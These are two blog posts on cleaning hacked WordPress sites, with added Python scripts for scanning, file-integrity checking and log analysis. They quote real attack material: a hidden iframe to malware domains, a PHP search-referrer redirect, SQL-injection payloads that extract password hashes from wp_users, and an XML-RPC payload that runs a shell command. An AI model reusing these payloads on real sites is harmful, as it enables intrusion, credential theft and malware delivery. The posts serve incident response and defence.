Is your website hacked? Website with hidden iframe to .cn website

Ok,

I recently had a couple of my websites hacked. I am not sure whether they were hacked directly or whether it was some malicious program installed on my computer. Here is what I found. Most of those websites had the following iframe code in their index files:

<iframe src="http:// superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
(link intentionally broken, for your own safety don't click on it)

The website superbetfair.cn was often replaced by some other website. In almost all cases they were .cn websites, e.g.:

<iframe src="http:// lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
(link intentionally broken, for your own safety don't click on it)

My first instinct was to simply clean the files. Research on the net showed that the infection was almost always in the index.php file, which made it relatively easier. After having spent four hours cleaning some deeply structured websites and WordPress blogs, I thought I was over with it. But NO!

The next day, or within a few hours, the infection was back. A few things had changed though.
In some of the websites the infection was again the same iframe code. However, in some other websites the infection was encoded and scrambled with JavaScript. In some rare cases it had gone further by scrambling the JavaScript with ASCII codes. Yes, it's those weird !56!66 numbers that you see after the script tag in your HTML code.

My first analysis was:

1. My host is infected - but I had to disregard that possibility, as the infection was on multiple sites across multiple hosts.
2. My password is hacked - again a tough nut for someone to crack unless I was being targeted.
3. My PC has been compromised - well, that kind of makes sense; I had my antivirus disabled for the last few days because it slows down my internet connection.

So I ran a scan of my PC, but no infection was detected. I knew I was up against something.

Luckily, a friend of mine does tech support for a renowned company. I gave him a call and he recommended two programs:

http://www.malwarebytes.org/

http://www.simplysup.com/tremover/download.html

I ran the first scan with Malwarebytes and bingo - it detected over 20 pieces of malware and a few registry hacks. I clicked a button and they were gone. Then I ran a full system scan with Malwarebytes.

The next step was to use Trojan Remover from Simplysup - I ran a quick scan and it detected a few files and quarantined them. Then I ran a full system scan. It took around 7 hours and detected nothing. Oh, btw, both of these programs come with a free trial, so I had not spent anything.

The next step was to turn my antivirus (Kaspersky) back on and perform a full system scan. This time Kaspersky came up with five possible threats and quarantined them.

The next step was to uninstall CoreFTP, the FTP program I had been using up to that point, and install the FileZilla client instead.

Meanwhile I had set up one of my staff members to change all passwords and login information, so by the time I had this done, all the logins and passwords were changed. (If you are suffering from this infection, I highly recommend that you change your passwords etc. from some other computer and don't log in using your old FTP program.)

Once all this was done, I started logging into my websites with the new credentials, without storing them in the client, and started cleaning the index.php files. It's a gruelling task, but after a few hours almost all sites were disinfected. 18 hours have passed and as of now I have not seen it return, so I am keeping my fingers crossed.

SPECIAL NOTE TO WORDPRESS USERS

If you are a WordPress blog owner and have this infection, you will have to clean the following files:

1. index.php in the root folder
2. index.php in the wp-content folder
3. index.php in the wp-admin folder
4. index.php in all the themes (all folders in the wp-content/theme folder)
5. default-filters.php in the wp-include folder (this is only in some installations)
6. Make sure you change your username and password for WordPress and FTP separately once you have cleaned your blog; also check for any plugin that has a file named index.

If your WordPress is infected, chances are you won't be able to log in to your admin panel either.

SPECIAL NOTE TO DRUPAL USERS

If you are seeing a parsing error on opening your Drupal-based website, that might be because of this infection. Just log in to your FTP account and download the index.php file. Remove the malicious line of code and you should be good to go again.
Please note you will have to change all passwords.

So far all looks good.

Special Note:

I am posting this because a friend of mine called up and asked if I knew about this; his website is apparently infected too. I might seem to have gone through a complex route to solve an easy problem, but anyhow, that is what worked for me. If you have an easier solution to this, let me know in the comments. Also, as usual, I suggest you take a backup wherever possible before going through these steps. I won't be liable for any damages; this is just free advice :)



PS: If this post helps you in any way, let me know :)


Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date. That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero-day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net.

If you’ve been hacked

1. Upgrade to the latest version of WordPress.
2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

define('SECRET_KEY', '1234567890');

Hidden Code

The bad guys are using a number of ways to hide their hacks:

The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten, so make sure you double check those files for any strange code that uses the eval() command or base64_decode(). Here’s a code snippet taken from here:


<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0;
foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php

Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
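A defender-side way to hunt for the injections described in both posts on this page (the hidden 1x1 iframe from the first post, and the eval()/base64_decode()/referrer-redirect code and the k1b0rg / keymachine.de markers from this one), as an added example that is not code from either post: a small Python scanner that walks a web root and reports which indicators each PHP/HTML/JS file matches. The regexes and the sample infected file are constructed for illustration (example.invalid stands in for the attacker domains) and are a starting point, not a complete signature set.

```python
import re
import tempfile
from pathlib import Path

# Indicators drawn from the injections described on this page. The regexes are
# illustrative assumptions, not a complete signature set; tune them for your tree.
INDICATORS = [
    # 1x1 or invisible iframe, as in the .cn iframe injection
    ("hidden-iframe", re.compile(
        r'<iframe[^>]*(?:width="?1"?[^>]*height="?1"?|visibility:\s*hidden|display:\s*none)[^>]*>', re.I)),
    # code that decodes and/or executes a hidden payload
    ("eval-or-base64", re.compile(r"\b(?:eval|base64_decode)\s*\(", re.I)),
    # long runs of percent- or hex-escaped characters, typical of scrambled JavaScript
    ("escaped-javascript", re.compile(r"(?:%[0-9a-f]{2}){8,}|(?:\\x[0-9a-f]{2}){8,}|\bunescape\s*\(", re.I)),
    # referrer check followed by a Location header: the search-engine redirect shown above
    ("referrer-redirect", re.compile(r"HTTP_REFERER[\s\S]{0,400}?header\s*\(\s*[\"']Location", re.I)),
    # strings the post says to grep for
    ("known-marker", re.compile(r"k1b0rg|keymachine\.de", re.I)),
]

SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".inc"}


def scan_text(text: str) -> list[str]:
    """Return the sorted indicator labels that match a file's contents."""
    return sorted(label for label, rx in INDICATORS if rx.search(text))


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every web file under root; map relative path -> matched indicators (hits only)."""
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed sample modelled on the snippets quoted on this page (example.invalid
# stands in for the attacker domains; this is not a real captured file).
SAMPLE_INFECTED = """<?php $seref=array("google","msn","yahoo"); $ser=0;
foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("ZXhhbXBsZS5pbnZhbGlk")."/"); exit; }?><?php
// original index.php continues here
?>
<html><body>
<iframe src="http://example.invalid/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>
"""

SAMPLE_CLEAN = "<?php\n// plain theme file\nget_header();\n?>\n<p>Hello</p>\n"


def demo() -> dict[str, list[str]]:
    """Write the two constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "themes" / "default").mkdir(parents=True)
        (root / "index.php").write_text(SAMPLE_INFECTED, encoding="utf-8")
        (root / "wp-content" / "themes" / "default" / "header.php").write_text(SAMPLE_CLEAN, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for rel, labels in demo().items():
        print(f"{rel}: {', '.join(labels)}")
```

Point scan_tree at a copy of the site downloaded over FTP rather than running it on the compromised host, and treat every hit as something to read by eye: legitimate plugins also call base64_decode(), so the list is a triage queue, not a verdict.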

Check your .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

That file may have this chunk of code too, which is to do with the uploader:

SecFilterEngine Off
SecFilterScanPOST Off
They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:

1. Open phpMyAdmin, go to your blog’s options table and find the active_plugins record.
2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
3. Check your uploads directory for that jpg file and delete it.

This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record, but it won’t hurt to do it.
Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

1. Change the passwords of all users on your system.
2. Make sure the hacker hasn’t added another user account he can use to log in again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.

The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinit

In the configuration file above I put the following:

/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*

That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
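What AIDE does for this setup, reduced to its essentials as an added Python example (not from the post and not AIDE's own code): hash every file under a web root into a baseline, skip the log and cache paths the configuration above excludes with "!" rules, and diff a later run against the baseline to report added, removed and changed files. The directory layout, file contents and the simulated compromise are constructed for the demonstration.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Paths to exclude, mirroring the "!" rules in the AIDE configuration above (regexes
# over the path relative to the monitored root; constructed for this example).
IGNORE_PATTERNS = [r"^logs/", r"/wp-content/cache/"]


def build_baseline(root: Path, ignore_patterns=IGNORE_PATTERNS) -> dict[str, str]:
    """Map each regular file under root (relative POSIX path) to its SHA-256 hex digest."""
    ignore = [re.compile(p) for p in ignore_patterns]
    baseline = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(rx.search(rel) for rx in ignore):
            continue
        baseline[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return baseline


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Report files that appeared, vanished or whose content changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def demo() -> dict[str, list[str]]:
    """Build a constructed web root, take a baseline, then simulate the changes the post describes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "public_html/wp-content/cache").mkdir(parents=True)
        (root / "logs").mkdir()
        (root / "public_html/index.php").write_text("<?php require './wp-blog-header.php'; ?>\n")
        (root / "public_html/wp-blog-header.php").write_text("<?php // original header\n")
        (root / "public_html/wp-content/cache/page-1").write_text("cached output\n")
        (root / "logs/access.log").write_text("first request\n")
        before = build_baseline(root)

        # Simulated compromise: a script gains an injected line, a PHP file disguised
        # as a .jpg lands in uploads, and the log grows (which must not be reported).
        (root / "public_html/wp-blog-header.php").write_text("<?php // original header\n// injected line\n")
        (root / "public_html/wp-content/uploads").mkdir(parents=True)
        (root / "public_html/wp-content/uploads/jhjyahjhnjnva.jpg").write_text("<?php // not an image\n")
        (root / "logs/access.log").write_text("first request\nsecond request\n")

        after = build_baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The baseline only proves anything if the attacker cannot rewrite it, so store it off the web server (or at least outside the web root and read-only), and run the comparison from cron so the daily e-mail the post describes arrives without anyone remembering to check.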

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you whether their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress" />

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array([cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;)
When that fails, he grabs xmlrpc.php.
He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA:

system.multicall
methodName: pingback.extensions.getPingbacks
params: http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
That fails too so the query is repeated with similar SQL.
http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array([title] => 1[url] => 1[blog_name] => 1[tb_id] => 666666\’[1740009377] => 1[496546471] => 1)
And another trackback:
URL: /wp-trackback.php?p=1
POST: Array([url] => ekibastos[title] => ekibastos[excerpt] => ekibastos[blog_name] => +AFw-\’)/*[charset] => UTF-7)
Before finally going back to xmlrpc.php with this POST request:
pingback.ping
k1b0rg’ icq: 76-86-20
http://ocaoimh.ie/?p=k1b0rg#lsadmin
In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
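The requests quoted above are easy to recognise in an access log once the path is URL-decoded until it stops changing (note the double-encoded %2527 in the GET requests, which a single decode leaves as %27). The following added Python example, not part of the post, parses combined-format log lines, decodes the request path repeatedly, and flags the UNION SELECT probes against wp_users, the user agent string the post quotes, and the burst of HEAD requests to wp-admin/post.php that precedes them. The log lines are constructed to mirror the sequence described in the post and use documentation IP ranges rather than the addresses given there.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Detection rules applied to the fully decoded request path (illustrative assumptions).
PATH_RULES = [
    ("sql-injection", re.compile(r"\bunion\s+(?:all\s+)?select\b|\bfrom\s+wp_users\b", re.I)),
    ("sql-comment-terminator", re.compile(r"'\)?\s*/\*|/\*\s*$")),
]
# Substring of the user agent the post reports for this bot.
UA_MARKERS = ("k1b compatible",)
HEAD_PROBE_PATH = "/wp-admin/post.php"
HEAD_PROBE_THRESHOLD = 3


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """URL-decode until stable, so %2527 becomes ' and '+' becomes a space."""
    for _ in range(max_rounds):
        decoded = unquote(path.replace("+", " "))
        if decoded == path:
            break
        path = decoded
    return path


def analyse(log_lines: list[str]) -> list[tuple[str, str, str]]:
    """Return (ip, label, detail) alerts for the given log lines."""
    alerts = []
    head_probes = Counter()
    for line in log_lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m is None:
            alerts.append(("-", "unparseable-line", line[:80]))
            continue
        rec = m.groupdict()
        decoded = fully_decode(rec["path"])
        for label, rx in PATH_RULES:
            if rx.search(decoded):
                alerts.append((rec["ip"], label, decoded))
        if any(marker in rec["ua"].lower() for marker in UA_MARKERS):
            alerts.append((rec["ip"], "known-bad-user-agent", rec["ua"]))
        if rec["method"] == "HEAD" and decoded.startswith(HEAD_PROBE_PATH):
            head_probes[rec["ip"]] += 1
    for ip, n in head_probes.items():
        if n >= HEAD_PROBE_THRESHOLD:
            alerts.append((ip, "repeated-head-probe", f"{n} HEAD requests to {HEAD_PROBE_PATH}"))
    return alerts


BOT_UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

# Constructed log lines modelled on the sequence described above (203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, not the addresses from the post).
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/May/2008:10:15:01 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 0 "-" "{BOT_UA}"',
    f'203.0.113.5 - - [10/May/2008:10:15:02 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 0 "-" "{BOT_UA}"',
    f'203.0.113.5 - - [10/May/2008:10:15:03 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 0 "-" "{BOT_UA}"',
    '203.0.113.5 - - [10/May/2008:10:15:09 +0100] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),'
    f'user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 4120 "-" "{BOT_UA}"',
    '198.51.100.7 - - [10/May/2008:10:16:00 +0100] "GET /?p=12 HTTP/1.1" 200 9876 '
    '"http://www.google.com/search?q=wordpress" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.0"',
]


def labels_for(ip: str, alerts: list[tuple[str, str, str]]) -> list[str]:
    """Sorted distinct labels raised for one client address."""
    return sorted({label for a_ip, label, _ in alerts if a_ip == ip})


if __name__ == "__main__":
    for ip, label, detail in analyse(SAMPLE_LOG):
        print(f"{ip:15} {label:22} {detail}")
```

Run it over the real access log with a cron job or feed it to whatever alerting you already have; the point of decoding until stable is that signatures written against the raw line miss the %2527 form, and the point of the HEAD counter is that the bot's behaviour identifies it even when it changes user agent.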
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.


test.method
','')); echo '______BEGIN______';
passthru('id');
echo '_____FIM_____';
exit;/*

Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
